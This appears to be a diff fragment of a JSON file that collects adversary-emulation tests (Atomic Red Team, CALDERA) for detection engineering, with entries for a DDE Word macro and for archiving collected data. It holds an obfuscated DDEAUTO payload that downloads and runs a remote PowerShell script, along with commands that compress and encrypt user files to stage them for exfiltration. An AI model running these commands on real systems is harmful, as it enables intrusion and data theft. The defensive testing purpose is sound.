Macro\n\n[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "steps": "1. Open Word\n\n2. Insert tab -> Quick Parts -> Field\n\n3. Choose = (Formula) and click ok.\n\n4. Once the field is inserted, you should now see \"!Unexpected End of Formula\"\n\n5. Right-click the Field, choose \"Toggle Field Codes\"\n\n6. Paste in the code from Unicorn or SensePost\n\n7. Save the Word document.\n\n9. DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe \"/k calc.exe\"\n\n10. DDEAUTO \"C:\\\\Programs\\\\Microsoft\\\\Office\\\\MSWord\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\\\v1.0\\\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # \" \"Microsoft Document Security Add-On\"\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1560.001", + "command_list": [ + "\"#{rar_exe}\" a -r #{output_file} %USERPROFILE%\\*#{file_extension}\n", + "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*.txt\n", + "\"#{rar_exe}\" a -r %USERPROFILE%\\T1560.001-data.rar #{input_path}\\*#{file_extension}\n", + "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "\"%programfiles%/WinRAR/Rar.exe\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{rar_exe}\" a -hp\"blue\" hello.rar\ndir\n", + "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%programfiles%/WinRAR/Rar.exe\" a -hp\"blue\" hello.rar\ndir\n", + "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\WinZip\\winzip64.exe\" -min -a -s\"hello\" archive.zip *\ndir\n", + "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{winzip_exe}\" -min -a -s\"hello\" archive.zip *\ndir\n", + "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{7zip_exe}\" u archive.7z *txt -pblue\ndir\n", + "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\7-zip\\7z.exe\" u archive.7z *txt -pblue\ndir\n", + "zip #{output_file} /var/log/{w,b}tmp\n", + "zip $HOME/data.zip #{input_files}\n", + "test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)\n", + "test -e #{input_file} && gzip -k #{input_file} || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> #{input_file}; gzip -k #{input_file})\n", + "tar -cvzf #{output_file} $HOME/$USERNAME\n", + "tar -cvzf $HOME/data.tar.gz #{input_file_folder}\n", + "mkdir -p /tmp/T1560\ncd /tmp/T1560; touch a b c d e f g\nzip --password \"#{encryption_password}\" /tmp/T1560/#{test_file} ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output /tmp/T1560/#{test_file}.zip.gpg -c /tmp/T1560/#{test_file}.zip\nls -l /tmp/T1560\n", + "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"#{encryption_password}\" #{test_folder}/T1560 ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/T1560.zip.gpg -c #{test_folder}/T1560.zip\nls -l #{test_folder}\n", + "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"InsertPasswordHere\" #{test_folder}/#{test_file} ./*\necho \"InsertPasswordHere\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip\nls -l #{test_folder}\n", + "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n", + "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n", + "tar -czf #{host.dir.git}.tar.gz -C \"#{host.dir.git}\" .; printf #{host.dir.git}.tar.gz;\n", + "tar -czf #{host.dir.git}.tar.gz -C #{host.dir.git} *; Write-Host #{host.dir.git}.tar.gz; exit 0;\n", + "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "Compress-Archive -Path #{host.dir.staged} -DestinationPath #{host.dir.staged}.zip -Force;\nsleep 1; ls #{host.dir.staged}.zip | foreach {$_.FullName} | select\n" + ], + "commands": [ + { + "command": "\"#{rar_exe}\" a -r #{output_file} %USERPROFILE%\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*.txt\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"#{rar_exe}\" a -r %USERPROFILE%\\T1560.001-data.rar #{input_path}\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "\"%programfiles%/WinRAR/Rar.exe\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{rar_exe}\" a -hp\"blue\" hello.rar\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%programfiles%/WinRAR/Rar.exe\" a -hp\"blue\" hello.rar\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\WinZip\\winzip64.exe\" -min -a -s\"hello\" archive.zip *\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{winzip_exe}\" -min -a -s\"hello\" archive.zip *\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{7zip_exe}\" u archive.7z *txt -pblue\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"%ProgramFiles%\\7-zip\\7z.exe\" u archive.7z *txt -pblue\ndir\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "zip #{output_file} /var/log/{w,b}tmp\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "zip $HOME/data.zip #{input_files}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "test -e #{input_file} && gzip -k #{input_file} || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> #{input_file}; gzip -k #{input_file})\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "tar -cvzf #{output_file} $HOME/$USERNAME\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "tar -cvzf $HOME/data.tar.gz #{input_file_folder}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir -p /tmp/T1560\ncd /tmp/T1560; touch a b c d e f g\nzip --password \"#{encryption_password}\" /tmp/T1560/#{test_file} ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output /tmp/T1560/#{test_file}.zip.gpg -c /tmp/T1560/#{test_file}.zip\nls -l /tmp/T1560\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"#{encryption_password}\" #{test_folder}/T1560 ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/T1560.zip.gpg -c #{test_folder}/T1560.zip\nls -l #{test_folder}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"InsertPasswordHere\" #{test_folder}/#{test_file} ./*\necho \"InsertPasswordHere\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip\nls -l #{test_folder}\n", + "source": "atomics/T1560.001/T1560.001.yaml", + "name": "Atomic Red Team Test - Archive Collected Data: Archive via Utility" + }, + { + "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n", + "source": "data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml", + "name": "This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux" + }, + { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n", + "source": "data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml", + "name": "This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux" + }, + { + "command": "tar -czf #{host.dir.git}.tar.gz -C \"#{host.dir.git}\" .; printf #{host.dir.git}.tar.gz;\n", + "source": "data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml", + "name": "This ability will compress a given git repository." + }, + { + "command": "tar -czf #{host.dir.git}.tar.gz -C #{host.dir.git} *; Write-Host #{host.dir.git}.tar.gz; exit 0;\n", + "source": "data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml", + "name": "This ability will compress a given git repository." + }, + { + "command": "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "source": "data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml", + "name": "Compress a directory on the file system" + }, + { + "command": "Compress-Archive -Path #{host.dir.staged} -DestinationPath #{host.dir.staged}.zip -Force;\nsleep 1; ls #{host.dir.staged}.zip | foreach {$_.FullName} | select\n", + "source": "data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml", + "name": "Compress a directory on the file system" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1560.001", + "display_name": "Archive Collected Data: Archive via Utility", + "atomic_tests": [ + { + "name": "Compress Data for Exfiltration With Rar", + "auto_generated_guid": "02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration.\nWhen the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_path": { + "description": "Path that should be compressed into our output file", + "type": "Path", + "default": "%USERPROFILE%" + }, + "file_extension": { + "description": "Extension of files to compress", + "type": "String", + "default": ".txt" + }, + "output_file": { + "description": "Path where resulting compressed data should be placed", + "type": "Path", + "default": "%USERPROFILE%\\T1560.001-data.rar" + }, + "rar_installer": { + "description": "Winrar installer", + "type": "Path", + "default": "%TEMP%\\winrar.exe" + }, + "rar_exe": { + "description": "The RAR executable from Winrar", + "type": "Path", + "default": "%programfiles%/WinRAR/Rar.exe" + } + }, + "dependencies": [ + { + "description": "Rar tool must be installed at specified location (#{rar_exe})\n", + "prereq_command": "if not exist \"#{rar_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading Winrar installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe\" #{rar_installer}\n#{rar_installer} /S\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "\"#{rar_exe}\" a -r #{output_file} #{input_path}\\*#{file_extension}\n", + "cleanup_command": "del /f /q /s #{output_file} >nul 2>&1\n" + } + }, + { + "name": "Compress Data and lock with password for Exfiltration with winrar", + "auto_generated_guid": "8dd61a55-44c6-43cc-af0c-8bdda276860c", + "description": "Note: Requires winrar installation\nrar a -p\"blue\" hello.rar (VARIANT)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "rar_installer": { + "description": "Winrar installer", + "type": "Path", + "default": "%TEMP%\\winrar.exe" + }, + "rar_exe": { + "description": "The RAR executable from Winrar", + "type": "Path", + "default": "%programfiles%/WinRAR/Rar.exe" + } + }, + "dependencies": [ + { + "description": "Rar tool must be installed at specified location (#{rar_exe})\n", + "prereq_command": "if not exist \"#{rar_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading Winrar installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe\" #{rar_installer}\n#{rar_installer} /S\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "mkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{rar_exe}\" a -hp\"blue\" hello.rar\ndir\n" + } + }, + { + "name": "Compress Data and lock with password for Exfiltration with winzip", + "auto_generated_guid": "01df0353-d531-408d-a0c5-3161bf822134", + "description": "Note: Requires winzip installation\nwzzip sample.zip -s\"blueblue\" *.txt (VARIANT)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "winzip_exe": { + "description": "Path to installed Winzip executable", + "type": "Path", + "default": "%ProgramFiles%\\WinZip\\winzip64.exe" + }, + "winzip_url": { + "description": "Path to download Windows Credential Editor zip file", + "type": "Url", + "default": "https://download.winzip.com/gl/nkln/winzip24-home.exe" + }, + "winzip_hash": { + "description": "File hash of the Windows Credential Editor zip file", + "type": "String", + "default": "B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Winzip must be installed\n", + "prereq_command": "cmd /c 'if not exist \"#{winzip_exe}\" (echo 1) else (echo 0)'\n", + "get_prereq_command": "if(Invoke-WebRequestVerifyHash \"#{winzip_url}\" \"$env:Temp\\winzip.exe\" #{winzip_hash}){\n Write-Host Follow the installation prompts to continue\n cmd /c \"$env:Temp\\winzip.exe\"\n}\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "path=%path%;\"C:\\Program Files (x86)\\winzip\"\nmkdir .\\tmp\\victim-files\ncd .\\tmp\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{winzip_exe}\" -min -a -s\"hello\" archive.zip *\ndir\n" + } + }, + { + "name": "Compress Data and lock with password for Exfiltration with 7zip", + "auto_generated_guid": "d1334303-59cb-4a03-8313-b3e24d02c198", + "description": "Note: Requires 7zip installation\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "7zip_installer": { + "description": "7zip installer", + "type": "Path", + "default": "%TEMP%\\7zip.exe" + }, + "7zip_exe": { + "description": "Path to installed 7zip executable", + "type": "Path", + "default": "%ProgramFiles%\\7-zip\\7z.exe" + } + }, + "dependencies": [ + { + "description": "7zip tool must be installed at specified location (#{7zip_exe})\n", + "prereq_command": "if not exist \"#{7zip_exe}\" (exit /b 1)\n", + "get_prereq_command": "echo Downloading 7-zip installer\nbitsadmin /transfer myDownloadJob /download /priority normal \"https://www.7-zip.org/a/7z2002-x64.exe\" #{7zip_installer}\n#{7zip_installer} /S\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "mkdir $PathToAtomicsFolder\\T1560.001\\victim-files\ncd $PathToAtomicsFolder\\T1560.001\\victim-files\necho \"This file will be encrypted\" > .\\encrypted_file.txt\n\"#{7zip_exe}\" u archive.7z *txt -pblue\ndir\n" + } + }, + { + "name": "Data Compressed - nix - zip", + "auto_generated_guid": "c51cec55-28dd-4ad2-9461-1eacbc82c3a0", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_files": { + "description": "Path that should be compressed into our output file, may include wildcards", + "type": "Path", + "default": "/var/log/{w,b}tmp" + }, + "output_file": { + "description": "Path that should be output as a zip archive", + "type": "Path", + "default": "$HOME/data.zip" + } + }, + "dependencies": [ + { + "description": "Files to zip must exist (#{input_files})\n", + "prereq_command": "if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)\necho Please set input_files argument to include files that exist\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "zip #{output_file} #{input_files}\n", + "cleanup_command": "rm -f #{output_file}\n" + } + }, + { + "name": "Data Compressed - nix - gzip Single File", + "auto_generated_guid": "cde3c2af-3485-49eb-9c1f-0ed60e9cc0af", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "Path that should be compressed", + "type": "Path", + "default": "$HOME/victim-gzip.txt" + }, + "input_content": { + "description": "contents of compressed files if file does not already exist. default contains test credit card and social security number", + "type": "String", + "default": "confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101" + } + }, + "executor": { + "name": "sh", + "elevation_required": false, + "command": "test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})\n", + "cleanup_command": "rm -f #{input_file}.gz\n" + } + }, + { + "name": "Data Compressed - nix - tar Folder or File", + "auto_generated_guid": "7af2b51e-ad1c-498c-aca8-d3290c19535a", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file_folder": { + "description": "Path that should be compressed", + "type": "Path", + "default": "$HOME/$USERNAME" + }, + "output_file": { + "description": "File that should be output", + "type": "Path", + "default": "$HOME/data.tar.gz" + } + }, + "dependencies": [ + { + "description": "Folder to zip must exist (#{input_file_folder})\n", + "prereq_command": "test -e #{input_file_folder}\n", + "get_prereq_command": "echo Please set input_file_folder argument to a folder that exists\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "tar -cvzf #{output_file} #{input_file_folder}\n", + "cleanup_command": "rm -f #{output_file}\n" + } + }, + { + "name": "Data Encrypted with zip and gpg symmetric", + "auto_generated_guid": "0286eb44-e7ce-41a0-b109-3da516e05a5f", + "description": "Encrypt data for exiltration\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "test_folder": { + "description": "Path used to store files.", + "type": "Path", + "default": "/tmp/T1560" + }, + "test_file": { + "description": "Temp file used to store encrypted data.", + "type": "Path", + "default": "T1560" + }, + "encryption_password": { + "description": "Password used to encrypt data.", + "type": "String", + "default": "InsertPasswordHere" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "gpg and zip are required to run the test.", + "prereq_command": "if [ ! -x \"$(command -v gpg)\" ] || [ ! -x \"$(command -v zip)\" ]; then exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "mkdir -p #{test_folder}\ncd #{test_folder}; touch a b c d e f g\nzip --password \"#{encryption_password}\" #{test_folder}/#{test_file} ./*\necho \"#{encryption_password}\" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip\nls -l #{test_folder}\n", + "cleanup_command": "rm -Rf #{test_folder}\n" + } + } + ] + }, + { + "id": "30a8cf10-73dc-497c-8261-a64cc9e91505", + "name": "Compress staged directory (Password Protected)", + "description": "This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux", + "tactic": "collection", + "technique": { + "attack_id": "T1560.001", + "name": "Archive Collected Data: Archive via Utility" + }, + "platforms": { + "linux": { + "sh": { + "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n", + "cleanup": "rm #{host.dir.staged}.tar.gz.gpg\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n", + "cleanup": "rm #{host.dir.staged}.7z\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + }, + { + "id": "2f90d4de-2612-4468-9251-b220e3727452", + "name": "Compress Git Repository", + "description": "This ability will compress a given git repository.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1560.001", + "name": "Archive Collected Data: Archive via Utility" + }, + "platforms": { + "linux": { + "sh": { + "command": "tar -czf #{host.dir.git}.tar.gz -C \"#{host.dir.git}\" .; printf #{host.dir.git}.tar.gz;\n", + "cleanup": "rm #{host.dir.git}.tar.gz;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh": { + "command": "tar -czf #{host.dir.git}.tar.gz -C #{host.dir.git} *; Write-Host #{host.dir.git}.tar.gz; exit 0;\n", + "cleanup": "Remove-Item -Path #{host.dir.git}.tar.gz;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + } + }, + { + "id": "300157e5-f4ad-4569-b533-9d1fa0e74d74", + "name": "Compress staged directory", + "description": "Compress a directory on the file system", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1560.001", + "name": "Archive Collected Data: Archive via Utility" + }, + "platforms": { + "darwin": { + "sh": { + "command": "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "cleanup": "rm #{host.dir.staged}.tar.gz\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz\n", + "cleanup": "rm #{host.dir.staged}.tar.gz\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "Compress-Archive -Path #{host.dir.staged} -DestinationPath #{host.dir.staged}.zip -Force;\nsleep 1; ls #{host.dir.staged}.zip | foreach {$_.FullName} | select\n", + "cleanup": "rm #{host.dir.staged}.zip\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.compress" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.dir.staged" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, 